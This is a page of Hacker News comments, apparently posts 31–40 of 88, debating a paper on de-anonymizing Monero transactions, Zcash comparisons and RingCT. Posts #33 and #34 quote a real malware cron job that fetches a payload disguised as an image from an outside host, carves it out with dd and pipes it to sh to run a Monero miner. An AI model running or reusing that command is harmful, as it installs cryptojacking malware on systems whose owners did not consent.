Live data from Hacker News

80% of Monero Transactions Trivially De-Anonymized

ipfs.io

31–40 of 88 posts

Re: 80% of Monero Transactions Trivially De-Anonymized

#31
post #19
post #7

Earlier quoted context omitted.

Are you talking about the fact that Zcash has, as a feature, the ability to make non-anonymous payments as well? Why would this be of interest to anyone studying the anonymity properties of Monero?

> Are you talking about the fact that Zcash has, as a feature, the ability to make non-anonymous payments as well? Last I checked virtually none of Zcash's transaction used the anonymous payment feature (presumably because the performance of it is very poor). So it's plausible that monero transactions could practically end up with a larger anonymity set in absolute terms than zcash (especially for current monero, whi…

There is nothing preventing memory usage from being brought into the ~250MB range. The performance issues stem from a legacy codebase built by academics and a focus on safety and enterprise features.

>So it's plausible that monero transactions could practically end up with a larger anonymity set in absolute terms than zcash (especially for current monero, which has CT and a minimum mixin size).

No, it isn't. There will always be a transaction graph between accounts, which limits the total number of possible routes between two participants in a trade.

Re: 80% of Monero Transactions Trivially De-Anonymized

#32
post #30
post #9

Hit piece guys, released by "director of ZCash" an hour before a scheduled hard fork for Monero.

What did you think about the empirical analysis from this paper?

It is simply a hit piece. Most of the issues discussed have already been considered by the monero devs and in fact, addressed. There is a reason why the authors limited their considerations to transactions before the RingCT update.

Re: 80% of Monero Transactions Trivially De-Anonymized

#33
post #4

What a coincidence! Just today at work we've found malware on some of our servers. That malware added this cron job: /60 * * * curl http://img1.imagehousing.com/0/art-825604.jpg -k|dd skip=2316 bs=1|sh If you execute that command (without | sh part) and save output into .sh script, you'll see that it is running a miner (consuming lots of CPU) for this Monero pool: xmr.crypto-pool.fr:3333 See: https://www.sophos.com/e…

There was Bitcoin malware back when CPU mining was feasible. If memory serves me correctly, someone figured out it would be break-even serving ads with JS bitcoin miners.

Re: 80% of Monero Transactions Trivially De-Anonymized

#34
post #18
post #4

What a coincidence! Just today at work we've found malware on some of our servers. That malware added this cron job: /60 * * * curl http://img1.imagehousing.com/0/art-825604.jpg -k|dd skip=2316 bs=1|sh If you execute that command (without | sh part) and save output into .sh script, you'll see that it is running a miner (consuming lots of CPU) for this Monero pool: xmr.crypto-pool.fr:3333 See: https://www.sophos.com/e…

that's a clever little cron job

Yeah that's a neat way of hosting malware on someone else's servers. It seems to also download a few binaries and put them in /tmp/ using the same trick.

Re: 80% of Monero Transactions Trivially De-Anonymized

#35
post #30

Earlier quoted context omitted.

What did you think about the empirical analysis from this paper?

It is simply a hit piece. Most of the issues discussed have already been considered by the monero devs and in fact, addressed. There is a reason why the authors limited their considerations to transactions before the RingCT update.

> There is a reason why the authors limited their considerations to transactions before the RingCT update.

No, they did not. The 80% figure comes from weaknesses of clients post RingCT update.

Re: 80% of Monero Transactions Trivially De-Anonymized

#36
post #5

Intellectually and academically dishonest hitpiece by peddlers of a competing cryptocoin. That this subset of transactions is not safe is not news, nor is it even original research - it was covered in research more than 2 years ago by The Monero Project itself - and is something the project has addressed since and is working to further improve even beyond the recommendations of this paper. Lengthy discussion on reddi…

This paper is an empirical analysis. The Monero reports introduced a theoretical attack with conditions, e.g. “a critical loss in untraceability across the whole network if parameters are poorly chosen and if an attacker owns a sufficient percentage of the network.” The news is that our research confirms, for the first time, that this is actually the case, and it affects actual transactions.

The core of this paper's claim seems to be that 0-mixin transactions leave user's exposed, however Monero has since prohibited these types of transactions. So yes, these types of transactions going backwards are exposed, but moving forward they will not be.

This appears to be the Monero's team main response. Am I missing any other substantive arguments from the paper?

Re: 80% of Monero Transactions Trivially De-Anonymized

#37

Earlier quoted context omitted.

It is simply a hit piece. Most of the issues discussed have already been considered by the monero devs and in fact, addressed. There is a reason why the authors limited their considerations to transactions before the RingCT update.

> There is a reason why the authors limited their considerations to transactions before the RingCT update. No, they did not. The 80% figure comes from weaknesses of clients post RingCT update.

From the paper:

Applicability to current and future transactions using RingCT. The weakness studied in this section is pri- marily a concern for transactions made in the past, as transactions using the new RingCT transaction option are generally immune.

Re: 80% of Monero Transactions Trivially De-Anonymized

#38
post #19

Earlier quoted context omitted.

> Are you talking about the fact that Zcash has, as a feature, the ability to make non-anonymous payments as well? Last I checked virtually none of Zcash's transaction used the anonymous payment feature (presumably because the performance of it is very poor). So it's plausible that monero transactions could practically end up with a larger anonymity set in absolute terms than zcash (especially for current monero, whi…

In the next version we'll clarify zcash shielded transactions are optional. Fwiw it's used by 28% of tx according to https://explorer.zcha.in/statistics/network and comments above, not "rarely used"

And how much of that is from miners who immediately cash out move it to a transparent address?

Re: 80% of Monero Transactions Trivially De-Anonymized

#39

Earlier quoted context omitted.

> There is a reason why the authors limited their considerations to transactions before the RingCT update. No, they did not. The 80% figure comes from weaknesses of clients post RingCT update.

From the paper: Applicability to current and future transactions using RingCT. The weakness studied in this section is pri- marily a concern for transactions made in the past, as transactions using the new RingCT transaction option are generally immune.

The key phrase being "in this section" - section 3 deals with the older vulnerability while section 4 deals with RingCT transactions.

Re: 80% of Monero Transactions Trivially De-Anonymized

#40
post #5

Intellectually and academically dishonest hitpiece by peddlers of a competing cryptocoin. That this subset of transactions is not safe is not news, nor is it even original research - it was covered in research more than 2 years ago by The Monero Project itself - and is something the project has addressed since and is working to further improve even beyond the recommendations of this paper. Lengthy discussion on reddi…

While they quantify the impact of an older vulnerability, the 80% figure comes from clients who are using the current implementation.
Post reply on HN